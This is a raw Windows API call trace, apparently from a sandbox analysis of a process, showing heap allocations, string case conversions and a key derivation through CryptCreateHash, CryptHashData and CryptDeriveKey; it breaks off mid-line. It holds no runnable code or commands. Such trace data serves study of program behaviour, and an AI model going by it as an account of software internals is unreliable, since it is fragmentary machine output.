RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.987] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.987] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.988] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.988] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.988] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.988] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.988] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.989] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.989] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.989] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.989] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.990] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.990] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.990] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0258.991] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.991] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.991] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.991] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.991] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.992] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.992] CryptHashData (hHash=0xaa58a0, pbData=0x24b2658, dwDataLen=0x3, dwFlags=0x1) returned 1 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.993] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.993] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.993] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.993] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.993] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.993] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.993] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.993] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.993] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.993] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.993] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.993] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.998] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.998] HeapFree (in: 